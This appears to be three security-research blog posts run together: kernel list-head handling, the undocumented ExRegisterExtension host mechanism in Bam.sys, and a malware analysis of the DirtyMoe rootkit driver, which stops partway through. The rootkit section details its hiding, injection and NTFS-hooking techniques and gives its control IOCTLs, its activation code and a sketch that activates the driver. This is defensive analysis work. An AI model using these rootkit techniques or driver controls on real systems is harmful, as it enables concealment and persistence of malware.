
Adventures in avoiding (list) head

Working with lists is hard. I can never get them right the first time and keep finding myself having to draw them to understand how they work, or forgetting to advance an entry and getting stuck in a loop. Every single time. Can you believe someone is actually paying me to write code? That runs in the kernel?

Anyway, I worked a lot with lists recently in a few projects that I might publish some day when I find the inner motivation to finish them. And I had the same problem in a few of them — I didn’t start iterating over the list from its head, but from a random item, without knowing where my list head was. And knowing where the list head is can be important.

Take this example — we want to parse the kernel process list and get the value of Process->DiskCounters->BytesRead for each process:
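A minimal sketch of the idea — EPROCESS is opaque, so the ActiveProcessLinks and DiskCounters offsets below are hypothetical placeholders that would be resolved from symbols for the running build:

#include <ntddk.h>

// Hypothetical, version-dependent offsets -- in practice resolved from symbols
// for the running build, never hardcoded.
static ULONG g_ActiveProcessLinksOffset; // offset of EPROCESS.ActiveProcessLinks
static ULONG g_DiskCountersOffset;       // offset of EPROCESS.DiskCounters

VOID DumpBytesReadForAllProcesses(VOID)
{
    // Start from a process we already have -- for example the current one.
    PUCHAR process = (PUCHAR)PsGetCurrentProcess();
    PLIST_ENTRY start = (PLIST_ENTRY)(process + g_ActiveProcessLinksOffset);
    PLIST_ENTRY entry = start;

    do {
        PUCHAR eprocess = (PUCHAR)entry - g_ActiveProcessLinksOffset;

        // DiskCounters points to a counters structure whose first field is
        // BytesRead (illustration only).
        PULONGLONG diskCounters = *(PULONGLONG *)(eprocess + g_DiskCountersOffset);
        if (diskCounters != NULL) {
            DbgPrint("Process %p read %llu bytes\n", eprocess, *diskCounters);
        }

        entry = entry->Flink; // advance, or we spin forever on the same entry
    } while (entry != start); // note: this naive loop also visits the list head
}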

This should work fine for any normal process.

But what will happen when we reach the list head?

The list head is not part of a real EPROCESS structure and it is surrounded by other, unrelated variables. If we try to treat it like a normal EPROCESS we will read those unrelated variables, possibly interpret them as pointers and dereference them, which will crash sooner or later.

But a useful thing to remember is that there is one significant difference between the list head and the rest of the list — lists connect data structures that are allocated in the pool, while the list head will be a global variable in the driver that manages the list (in our example, ntoskrnl.exe has nt!PsActiveProcessHead as a global variable, used to access the process list).

There is no easy way that I know of to check if an address is in the pool or not, but we can use a trick and call RtlPcToFileHeader. This function receives an address and writes the base address of the image it’s in into an output parameter. So we can do:
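A minimal sketch of that check (the helper name is mine):

#include <ntddk.h>

// Returns TRUE if Address lies inside a loaded image -- i.e. it cannot be a
// pool-allocated list entry, so it is most likely the list head.
BOOLEAN IsAddressInsideImage(_In_ PVOID Address)
{
    PVOID imageBase = NULL;
    return RtlPcToFileHeader(Address, &imageBase) != NULL;
}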

We can also verify that the list head is inside the image it’s supposed to be in, by getting the image base address from a known symbol and comparing:
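Continuing the sketch above — for the process list the expected image is ntoskrnl itself, and any exported kernel symbol can be used to find its base:

// Check whether Entry lies inside the same image as a known ntoskrnl export.
// nt!PsActiveProcessHead is a global in ntoskrnl, so for the process list the
// expected image is the kernel itself.
BOOLEAN IsEntryInKernelImage(_In_ PVOID Entry)
{
    PVOID ntBase = NULL;
    PVOID entryBase = NULL;

    RtlPcToFileHeader((PVOID)PsGetCurrentProcessId, &ntBase); // any nt export works
    RtlPcToFileHeader(Entry, &entryBase);

    return (entryBase != NULL) && (entryBase == ntBase);
}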

Windows RS3 added the useful RtlPcToFileName function, which makes our code a bit prettier.

Yes, More Callbacks — The Kernel Extension Mechanism

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run, for example, "!wdbgark.wa_systemcb /type process" in WinDbg, we'll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually stored in a function table named bam!BampKernelCalloutTable, which is later passed, together with some other parameters (we’ll talk about them in a minute), to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);
typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the number of functions supplied in RegistrationInfo->FunctionCount matches the expected number set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.
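Based on these points, here is a rough reconstruction of the logic — not the actual pseudo-code from appendix B; ExpFindHost’s prototype, the opaque PEX_EXTENSION type, and the status codes are my assumptions, and the structures are the ones shown in this post:

typedef PVOID PEX_EXTENSION;                                // opaque handle (assumption)
PHOST_LIST_ENTRY ExpFindHost(USHORT Id, USHORT Version);    // internal, assumed prototype

NTSTATUS ExRegisterExtension(
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,   // selects the registration structure layout (1 here)
    _In_ PVOID RegistrationInfo)
{
    PEX_EXTENSION_REGISTRATION_1 reg = (PEX_EXTENSION_REGISTRATION_1)RegistrationInfo;

    // 1. Find a host matching the extension id / version.
    PHOST_LIST_ENTRY host = ExpFindHost(reg->ExtensionId, reg->ExtensionVersion);
    if (host == NULL)
        return STATUS_NOT_FOUND;

    // 2. The function count must match, and the host must not already
    //    have an extension registered.
    if (host->FunctionCount != reg->FunctionCount || host->FunctionTable != NULL)
        return STATUS_INVALID_PARAMETER;

    // 3. Publish the driver's callback table in the host.
    host->FunctionTable = reg->FunctionTable;

    // 4. Hand the driver its table of unexported nt functions.
    if (reg->HostInterface != NULL)
        *reg->HostInterface = host->HostInterface;

    // 5. Return the initialized host to the caller.
    *Extension = (PEX_EXTENSION)host;
    return STATUS_SUCCESS;
}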

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;   // number of callbacks that the extension contains
    POOL_TYPE PoolType;     // where this host is allocated
    PVOID HostInterface;    // table of unexported nt functions, to be used by
                            // the driver to which this extension belongs
    PVOID FunctionAddress;  // optional, rarely used. This callback is called
                            // before and after an extension for this host is
                            // registered / unregistered
    PVOID ArgForFunction;   // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that the driver "registers"
    DWORD Flags;            // only uses one bit. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS on certain occasions, which makes them a kind of callback.
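For illustration, the driver-side half of this handshake might look roughly like the following, reusing the PEX_EXTENSION placeholder from the sketch above. The extension id/version values, the RegistrationVersion value, and the callback prototypes are placeholders; only the overall shape follows what Bam.sys does in bam!BampRegisterKernelExtension:

// Callback implementations live elsewhere in the driver; the prototypes here
// are placeholders, since the real ones are not documented.
VOID BampCreateProcessCallback(VOID);
VOID BampSetThrottleStateCallback(VOID);
VOID BampGetThrottleStateCallback(VOID);
VOID BampSetUserSettings(VOID);
VOID BampGetUserSettingsHandle(VOID);

static PVOID BampKernelCalloutTable[5] = {
    (PVOID)BampCreateProcessCallback,
    (PVOID)BampSetThrottleStateCallback,
    (PVOID)BampGetThrottleStateCallback,
    (PVOID)BampSetUserSettings,
    (PVOID)BampGetUserSettingsHandle,
};

static PVOID BampHostInterface;   // receives the table of unexported nt functions
static PEX_EXTENSION BampExtension;

NTSTATUS BampRegisterKernelExtension(_In_ PDRIVER_OBJECT DriverObject)
{
    EX_EXTENSION_REGISTRATION_1 registration = { 0 };

    registration.ExtensionId      = 0;  // Bam's actual id -- placeholder only
    registration.ExtensionVersion = 1;  // placeholder only
    registration.FunctionCount    = (USHORT)RTL_NUMBER_OF(BampKernelCalloutTable);
    registration.FunctionTable    = BampKernelCalloutTable;
    registration.HostInterface    = &BampHostInterface;
    registration.DriverObject     = DriverObject;

    return ExRegisterExtension(&BampExtension, 1, &registration);
}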

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which points to a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid out in the exact order presented here, since they are called according to their index — as we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;   // number of callbacks that the extension contains
    POOL_TYPE PoolType;     // where this host is allocated
    PVOID HostInterface;    // table of unexported nt functions, to be used by
                            // the driver to which this extension belongs
    PVOID FunctionAddress;  // optional, rarely used. This callback is called
                            // before and after an extension for this host is
                            // registered / unregistered
    PVOID ArgForFunction;   // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that the driver "registers"
    DWORD Flags;            // only uses one flag. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;


DirtyMoe: Rootkit Driver

Abstract

In the first post, DirtyMoe: Introduction and General Overview of Modularized Malware, we described a complex and sophisticated piece of malware called DirtyMoe. The main observed roles of the malware are cryptojacking and DDoS attacks, which are still popular. There is no doubt that the malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems, where the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses the Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good piece of malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is the use of rootkits. In general, the main goal of a rootkit is to hide itself and other modules of the hosted malware at the kernel layer. Rootkits are potent tools but carry a high risk of being detected, because they work in kernel mode and each critical bug leads to a BSoD.

The primary aim of this article is to analyze the rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of the DirtyMoe driver, aiming to provide comprehensive information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities in both kernel and user mode. Moreover, the driver can execute commands received from user mode under kernel privileges. Another significant aspect of the driver is the injection of an arbitrary DLL file into targeted processes. Last but not least is the driver’s ability to censor the file system content. We also describe the refined routine that deploys the driver into the kernel and the anti-forensic methods the malware authors used.

Another essential point of this research is the investigation of the driver’s metadata, which showed that the driver is code-signed with certificates that were stolen and revoked in the past. However, these certificates are widespread in the wild and are still misused by other malicious software.

Finally, the last part summarises the rootkit functionality and draws together the key findings about the digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and the sources of the rootkit techniques used.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a Windows driver that DirtyMoe drops on system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the sample as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries, FltMgr and ntoskrnl. Table 1 summarizes the most suspicious methods from the driver’s point of view.

Routine: Description
FltSetCallbackDataDirty: A minifilter driver’s pre- or post-operation callback calls this routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId: Returns the process ID of the process that requested a given I/O operation.
FltRegisterFilter: Registers a minifilter driver.
ZwDeleteValueKey, ZwSetValueKey, ZwQueryValueKey, ZwOpenKey: Routines that delete, set, query, and open registry entries in kernel mode.
ZwTerminateProcess: Terminates a process and all of its threads in kernel mode.
ZwQueryInformationProcess: Retrieves information about the specified process.
MmGetSystemRoutineAddress: Returns a pointer to a function specified by a routine name parameter.
ZwAllocateVirtualMemory: Reserves a range of application-accessible virtual addresses in the specified process in kernel mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routines via MmGetSystemRoutineAddress() as a form of obfuscation, since the string table contains names of routines operating with virtual memory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel routine ZwQueryInformationProcess() and strings such as services.exe and winlogon.exe indicate that the rootkit probably works with kernel structures of critical Windows processes.
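The lookup itself is a documented one-liner; for example (a sketch, not the malware’s exact code):

#include <ntddk.h>

// Resolve an exported kernel routine by name at run time instead of importing it,
// so the routine does not appear in the import table. The name still has to live
// somewhere, which is why the driver's string table gives the trick away here.
// Note: MmGetSystemRoutineAddress returns NULL for names not exported by
// ntoskrnl or the HAL.
PVOID LookupKernelRoutine(VOID)
{
    UNICODE_STRING name = RTL_CONSTANT_STRING(L"ZwQueryInformationProcess");
    return MmGetSystemRoutineAddress(&name);
}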

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions originally needing high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in user mode just sends a defined control code and data to the driver, and the driver performs the corresponding high-privilege action.

Further, the malware can use the driver to hide some records, helping to mask the malicious activities. The driver affects the system registry and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which drivers are visible or not. Therefore, the malware is active, but the system and the user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a minifilter mechanism. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function: Description
Driver Entry: Routine called by the kernel when the driver is loaded.
Start Routine: Run as a kernel thread that restores the driver configuration from the system registry.
Device Control: Processes system-defined I/O control codes (IOCTLs) controlling the driver from user mode.
Minifilter Driver: Routine that completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification: Routine that registers a driver-supplied callback notified when a new thread is created.
Callback of NTFS Driver: Wraps the original callback of the NTFS driver for the IRP_MJ_CREATE major function.
Registry Hiding: Hook method that provides registry key hiding.
Service Hiding: Routine hiding a defined service.
Driver Hiding: Routine hiding a defined driver.
Driver Unload: Routine called by the kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after the driver is loaded. The driver initializes a large number of global variables for its proper operation. Firstly, the driver detects the OS version and sets up the required offsets for further malicious use. Secondly, a variable pointing to the driver image is initialized; the driver image is later used for driver hiding. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no action of interest,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation() callback; it filters access to the system drives and allows the driver to hide files and directories.

Further, the initialization method swaps the IRP_MJ_CREATE major function of the \FileSystem\Ntfs driver. So, each API call to CreateFile() or the kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback via PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors thread creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls the Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from user mode. The following Table 3 summarizes the controlling IOCTLs that can be sent by the malware using the Win32 API.

IOCTL: Description
0x222C80: The driver accepts other IOCTLs only if the driver is activated. Malware in user mode can activate the driver by sending this IOCTL and an authorization code equal to 0xB6C7C230.
0x2224C0: The malware sends data which the driver writes to the system registry. The key, value, and data type are set by Setting control codes. (used variables: regKey, regValue, regData, regType)
0x222960: This IOCTL clears all data stored by the driver. (used variables: see Setting and Inserting variables)
0x2227EC: If the malware needs to hide a specific driver, the driver adds that driver name to listBaseDllName and hides it using Driver Hiding.
0x2227E8: The driver adds the name of a registry key to the WinDeviceAddress list and hides this key using Registry Hiding. (used variable: WinDeviceAddress)
0x2227F0: The driver hides a given service defined by the name of its DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC: If the malware wants to deactivate Registry Hiding, the driver restores the original kernel GetCellRoutine().
0x222004: The malware sends the ID of a process it wants to terminate. The driver calls the kernel function ZwTerminateProcess() and terminates the process and all of its threads regardless of malware privileges.
0x2224C8: The malware sends data which the driver writes to the file defined by the filePath variable; see Setting control codes. (used variables: filePath, fileData)
Table 3. Controlling IOCTLs
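From the user-mode side, activating the driver would look roughly like this. The device/symbolic-link name and the exact input-buffer layout are not described in the article, so both are assumptions; only the IOCTL code and the authorization value come from Table 3.

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // The device/symbolic-link name is NOT known from the article -- placeholder only.
    HANDLE device = CreateFileW(L"\\\\.\\PLACEHOLDER_DEVICE_NAME",
                                GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
        return 1;

    // 0x222C80 activates the driver; 0xB6C7C230 is the authorization code
    // (Table 3). Passing the code in the input buffer is an assumption.
    DWORD authCode = 0xB6C7C230;
    DWORD bytesReturned = 0;
    BOOL ok = DeviceIoControl(device, 0x222C80,
                              &authCode, sizeof(authCode),
                              NULL, 0, &bytesReturned, NULL);

    printf("activation %s\n", ok ? "succeeded" : "failed");
    CloseHandle(device);
    return 0;
}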
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

Registry HIVE:
  WinDeviceAddress: Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name:
  WinDeviceMaker: Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, where it grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding of files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
  WinDeviceMakerB: Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, where it grants access to the NTFS file systems.
  WinDeviceMakerOnly: Specifies a blacklist of processes defined by process image file name. It is used in Callback of NTFS Driver, where it refuses access to the NTFS file systems.
File names (full path):
  WinDeviceName, WinDeviceNameB: Determine a whitelist of files to which Callback of NTFS Driver should grant access. They are used in combination with WinDeviceMaker and WinDeviceMakerB, so if a file is on the whitelist and the requesting process is also whitelisted, the driver grants access to the file.
  WinDeviceNameOnly: Defines a blacklist of files to which Callback of NTFS Driver should deny access. It is used in combination with WinDeviceMakerOnly, so if a file is on the blacklist and the requesting process is also blacklisted, the driver refuses access to the file.
File names (containing a number):
  WinDeviceNumber: Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a naming convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}, i.e., a file name that includes a number.
Process ID:
  ListProcessId1: Defines a list of processes requiring access to NTFS file systems. The malware does not restrict access for these processes; see Callback of NTFS Driver.
  ListProcessId2: The same purpose as ListProcessId1. Additionally, it is used as the whitelist for Registry Hiding, so the driver does not restrict access. Minifilter Driver also does not limit processes in this list.
Driver names:
  listBaseDllName: Defines a list of drivers that should be hidden in the system; see Driver Hiding.
Service names:
  listServices: Specifies a list of services that should be hidden in the system; see Service Hiding.
Table 4. White and black lists
Setting

The setting control codes store scalar values in global variables. The following Table 5 summarizes and groups these variables and their purpose.

File Writing (Shutdown):
  filename1_for_ShutDown, data1_for_ShutDown: Define a file name and data for the first file written during the driver shutdown.
  filename2_for_ShutDown, data2_for_ShutDown: Define a file name and data for the second file written during the driver shutdown.
Registry Writing (Shutdown):
  regKey1_shutdown, regValue1_shutdown, regData1_shutdown, regType1: Specify the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
  regKey2_shutdown, regValue2_shutdown, regData2_shutdown, regType2: Specify the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing:
  filePath: Determines the file name which will be used to write data; see Controlling IOCTL 0x2224C8.
Registry Writing:
  regKey, regValue, regType: Specify the registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.); see Controlling IOCTL 0x2224C0.
Unknown (unused):
  dwWinDevicePathA, dwWinDeviceDataA: Keep a path and data for file A.
  dwWinDevicePathB, dwWinDeviceDataB: Keep a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Process to Inject:
  dwWinDriverMaker2, dwWinDriverMaker2_2: Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
  dwWinDriverMaker1, dwWinDriverMaker1_2: Defines two process names that should be injected if the process is created.
DLL to Inject:
  dwWinDriverPath1, dwWinDriverDataA: Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
  dwWinDriverPath1_2, dwWinDriverDataA_2: Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
  dwWinDriverPath2, dwWinDriverDataB: Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
  dwWinDriverPath2_2, dwWinDriverDataB_2: Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().
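For reference, a minimal sketch of such a registration (not the malware’s code; the callback and unload routines are reduced to stubs):

#include <fltKernel.h>

static PFLT_FILTER g_Filter;

// Post-operation callback for directory queries -- this is where the results
// of QueryDirectory could be filtered or modified.
static FLT_POSTOP_CALLBACK_STATUS
PostDirectoryControl(
    _Inout_ PFLT_CALLBACK_DATA Data,
    _In_ PCFLT_RELATED_OBJECTS FltObjects,
    _In_opt_ PVOID CompletionContext,
    _In_ FLT_POST_OPERATION_FLAGS Flags)
{
    UNREFERENCED_PARAMETER(Data);
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    UNREFERENCED_PARAMETER(Flags);
    return FLT_POSTOP_FINISHED_PROCESSING;
}

static NTSTATUS FilterUnload(_In_ FLT_FILTER_UNLOAD_FLAGS Flags)
{
    UNREFERENCED_PARAMETER(Flags);
    FltUnregisterFilter(g_Filter);
    return STATUS_SUCCESS;
}

// QueryDirectory arrives as IRP_MJ_DIRECTORY_CONTROL (minor code IRP_MN_QUERY_DIRECTORY).
static const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_DIRECTORY_CONTROL, 0, NULL, PostDirectoryControl },
    { IRP_MJ_OPERATION_END }
};

static const FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION),      // Size
    FLT_REGISTRATION_VERSION,      // Version
    0,                             // Flags
    NULL,                          // ContextRegistration
    Callbacks,                     // OperationRegistration
    FilterUnload,                  // FilterUnloadCallback
    // remaining optional callbacks default to NULL
};

NTSTATUS RegisterMinifilter(_In_ PDRIVER_OBJECT DriverObject)
{
    NTSTATUS status = FltRegisterFilter(DriverObject, &FilterRegistration, &g_Filter);
    if (NT_SUCCESS(status)) {
        status = FltStartFiltering(g_Filter);
        if (!NT_SUCCESS(status))
            FltUnregisterFilter(g_Filter);
    }
    return status;
}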

